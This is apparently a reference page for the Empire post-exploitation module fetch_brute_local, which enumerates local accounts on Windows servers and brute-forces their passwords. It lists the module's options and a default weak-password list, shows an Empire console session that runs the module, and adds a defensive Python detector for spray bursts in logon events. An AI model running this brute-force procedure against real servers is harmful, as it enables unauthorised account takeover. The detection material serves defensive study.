Fetch local accounts on a member server and perform an online brute force attack - Empire Module
This page contains detailed information about how to use the powershell/recon/fetch_brute_local Empire module. For a list of all Empire modules, visit the Empire Module Library.
Module Overview
Name: Fetch local accounts on a member server and perform an online brute force attack
Module: powershell/recon/fetch_brute_local
Source code [1]: empire/server/modules/powershell/recon/fetch_brute_local.yaml
Source code [2]: empire/server/modules/powershell/recon/fetch_brute_local.py
MITRE ATT&CK:
T1110
Language: PowerShell
Needs admin: No
OPSEC safe: Yes
Background: Yes
The fetch_brute_local module will log on to a member server using the agent's account or a provided account, fetch the local accounts and perform a network-based brute force attack against them.
According to its metadata the module runs in the background and is marked OPSEC safe in Empire's sense (it does not write to disk on the agent host), but the repeated logon attempts it generates are themselves visible on the target as failed logon events and can be picked up by logon monitoring.
Note that the fetch_brute_local module does not need administrative privileges to work properly, so a normal (non-admin) user context is enough to run it.
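The behaviour described above leaves a characteristic trace on the server being probed: a burst of failed network logons (Windows Security event 4625, logon type 3) from a single source host, spread across many target accounts, sometimes followed by a successful network logon (4624) for one of them. The following detection logic is an added example written for this page, not code from Empire or its authors; the event lines, field names (EventID, LogonType, TargetUserName, IpAddress), IP addresses, account names and thresholds are all constructed sample values.

```python
"""Flag hosts that fail network logons against many distinct accounts in a
short window, and report which accounts then logged on successfully.

Added example for this page; not part of the Empire project. The events are
constructed sample data flattened to one key=value line each.
"""
from collections import defaultdict, namedtuple
from datetime import datetime, timedelta

Event = namedtuple("Event", "ts event_id logon_type account source")

# Constructed sample log lines. 10.0.0.5 plays the host running the module
# (two passwords tried against five local accounts, one of which succeeds);
# 127.0.0.1 is an ordinary user mistyping a password at the console twice.
SAMPLE_LINES = [
    "2024-01-10T09:00:01 EventID=4625 LogonType=3 TargetUserName=backupsvc IpAddress=10.0.0.5",
    "2024-01-10T09:00:02 EventID=4625 LogonType=3 TargetUserName=deploy IpAddress=10.0.0.5",
    "2024-01-10T09:00:03 EventID=4625 LogonType=3 TargetUserName=svc_legacy IpAddress=10.0.0.5",
    "2024-01-10T09:00:04 EventID=4625 LogonType=3 TargetUserName=localadmin IpAddress=10.0.0.5",
    "2024-01-10T09:00:05 EventID=4625 LogonType=3 TargetUserName=helpdesk IpAddress=10.0.0.5",
    "2024-01-10T09:00:06 EventID=4625 LogonType=3 TargetUserName=backupsvc IpAddress=10.0.0.5",
    "2024-01-10T09:00:07 EventID=4625 LogonType=3 TargetUserName=deploy IpAddress=10.0.0.5",
    "2024-01-10T09:00:08 EventID=4624 LogonType=3 TargetUserName=svc_legacy IpAddress=10.0.0.5",
    "2024-01-10T09:00:09 EventID=4625 LogonType=3 TargetUserName=localadmin IpAddress=10.0.0.5",
    "2024-01-10T09:00:10 EventID=4625 LogonType=3 TargetUserName=helpdesk IpAddress=10.0.0.5",
    "2024-01-10T09:05:00 EventID=4625 LogonType=2 TargetUserName=jsmith IpAddress=127.0.0.1",
    "2024-01-10T09:05:20 EventID=4625 LogonType=2 TargetUserName=jsmith IpAddress=127.0.0.1",
    "2024-01-10T09:05:40 EventID=4624 LogonType=2 TargetUserName=jsmith IpAddress=127.0.0.1",
]


def parse_event(line):
    """Parse one flattened event line into an Event."""
    ts_str, *fields = line.split()
    kv = dict(f.split("=", 1) for f in fields)
    return Event(datetime.fromisoformat(ts_str), int(kv["EventID"]),
                 int(kv["LogonType"]), kv["TargetUserName"], kv["IpAddress"])


def find_spray_sources(lines, window=timedelta(minutes=10),
                       min_failures=8, min_accounts=5):
    """Return {source_ip: summary} for sources whose failed network logons
    (4625, logon type 3) within any `window` hit at least `min_failures`
    attempts across at least `min_accounts` distinct accounts.

    Requiring many *distinct* accounts is what separates a spray over
    enumerated local accounts from one user repeatedly mistyping a password.
    """
    events = sorted((parse_event(l) for l in lines), key=lambda e: e.ts)
    by_source = defaultdict(list)
    for e in events:
        if e.event_id == 4625 and e.logon_type == 3:
            by_source[e.source].append(e)

    alerts = {}
    for source, fails in by_source.items():
        best, start = None, 0
        for end in range(len(fails)):
            # Slide the window start forward until the span fits in `window`.
            while fails[end].ts - fails[start].ts > window:
                start += 1
            chunk = fails[start:end + 1]
            accounts = {e.account for e in chunk}
            if len(chunk) >= min_failures and len(accounts) >= min_accounts:
                if best is None or len(chunk) > best["failures"]:
                    best = {"first": chunk[0].ts, "last": chunk[-1].ts,
                            "failures": len(chunk), "accounts": accounts}
        if best:
            alerts[source] = best
    return alerts


def successes_after_spray(lines, alerts, grace=timedelta(minutes=30)):
    """Return {source_ip: [accounts]} for successful network logons (4624,
    logon type 3) from a flagged source during or shortly after its burst:
    these are the accounts whose password was most likely guessed."""
    hits = defaultdict(list)
    for e in (parse_event(l) for l in lines):
        a = alerts.get(e.source)
        if (a and e.event_id == 4624 and e.logon_type == 3
                and a["first"] <= e.ts <= a["last"] + grace):
            hits[e.source].append(e.account)
    return dict(hits)


if __name__ == "__main__":
    found = find_spray_sources(SAMPLE_LINES)
    for src, info in found.items():
        print(f"{src}: {info['failures']} failures across "
              f"{len(info['accounts'])} accounts, {info['first']}..{info['last']}")
    print("successful logons after burst:", successes_after_spray(SAMPLE_LINES, found))
```

On the constructed data only 10.0.0.5 is flagged (nine failures across five accounts in ten seconds, then a successful network logon for svc_legacy), while the console typo from 127.0.0.1 stays below both thresholds. Tune `window`, `min_failures` and `min_accounts` to the normal failure rate of the server being watched; the short default password lists such modules use mean the whole burst can be over in seconds, so the window matters less than the distinct-account count.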
Required Module Options
This is a list of options that are required by the fetch_brute_local module:
Agent
Agent to run the module on.
Passlist
Comma-separated password list that should be tested against each account found.
Default value: Welcome123,Password01,Test123!,Welcome2018
Additional Module Options
This is a list of additional options that are supported by the fetch_brute_local module:
Loginacc
Allows you to query the servers using credentials other than the credentials the agent is running as.
Loginpass
The password that comes with Loginacc.
ServerType
Allows you to narrow down the scope. It defaults to all Windows servers.
Default value: Window*Server*
Verbose
Set this to any value to also report failed logon attempts and the users that were found.
Fetch_brute_local Example Usage
Here's an example of how to use the fetch_brute_local module in the Empire client console:
[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/windows/ducky) > usemodule powershell/recon/fetch_brute_local
Author Maarten Hartsuijker
@classityinfosec
Background True
Comments Inspired by Xfocus X-Scan. Recent Windows versions won't allow you to
query userinfo using regular domain accounts, but on 2003/2008 member
servers, the module might prove to be useful.
Description This module will logon to a member server using the agents account or
a provided account, fetch the local accounts and perform a network
based brute force attack.
Language powershell
Name powershell/recon/fetch_brute_local
NeedsAdmin False
OpsecSafe True
Techniques http://attack.mitre.org/techniques/T1110
,Record Options------------------------------------,----------,-------------------------------------,
| Name | Value | Required | Description |
|------------|-------------------------------------|----------|-------------------------------------|
| Agent | | True | Agent to run the module on. |
|------------|-------------------------------------|----------|-------------------------------------|
| Loginacc | | False | Allows you to query the servers |
| | | | using credentials other than the |
| | | | credentials the agent is running as |
|------------|-------------------------------------|----------|-------------------------------------|
| Loginpass | | False | The password that comes with |
| | | | Loginacc |
|------------|-------------------------------------|----------|-------------------------------------|
| Passlist | Welcome123,Password01,Test123!,Welc | True | Comma seperated password list that |
| | ome2018 | | should be tested against each |
| | | | account found |
|------------|-------------------------------------|----------|-------------------------------------|
| ServerType | Window*Server* | False | Allows you to narrow down the |
| | | | scope. It defaults to all windows |
| | | | servers. |
|------------|-------------------------------------|----------|-------------------------------------|
| Verbose | | False | Want to see failed logon attempts? |
| | | | And found users? Set this to any |
| | | | value. |
'------------'-------------------------------------'----------'-------------------------------------'
(Empire: usemodule/powershell/recon/fetch_brute_local) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/powershell/recon/fetch_brute_local) > set Passlist Welcome123,Password01,Test123!,Welcome2018
[*] Set Passlist to Welcome123,Password01,Test123!,Welcome2018
(Empire: usemodule/powershell/recon/fetch_brute_local) > execute
[*] Tasked Y4LHEV83 to run Task 1
...
Now wait for the results to come back from the agent.
Authors
- Maarten Hartsuijker
- @classityinfosec
References
- https://github.com/BC-SECURITY/Empire/tree/master/empire/server/modules/powershell/recon/fetch_brute_local.yaml
- https://github.com/BC-SECURITY/Empire/tree/master/empire/server/modules/powershell/recon/fetch_brute_local.py
- http://attack.mitre.org/techniques/T1110
See Also
See also the following modules related to this one:
- powershell/recon/get_sql_server_login_default_pw
- powershell/recon/http_login
- powershell/recon/find_fruit
- powershell/situational_awareness/network/powerview/find_localadmin_access
- powershell/situational_awareness/network/powerview/get_localgroup
- powershell/situational_awareness/host/hostrecon
- powershell/situational_awareness/network/smbautobrute
Version
This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.